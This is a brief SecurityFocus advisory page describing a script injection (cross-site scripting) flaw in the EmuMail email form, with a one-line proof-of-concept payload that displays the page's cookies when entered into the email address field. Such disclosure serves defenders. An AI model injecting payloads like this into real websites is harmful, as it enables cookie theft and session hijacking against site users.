info
discussion
exploit
solution
references
EmuMail Email Form Script Injection Vulnerability
Contributed by FVS <fab@aisec.net>:
Entering the string below into the email address field on the main form:
<script>alert(document.cookie)</script>
Privacy Statement
Copyright 2010, SecurityFocus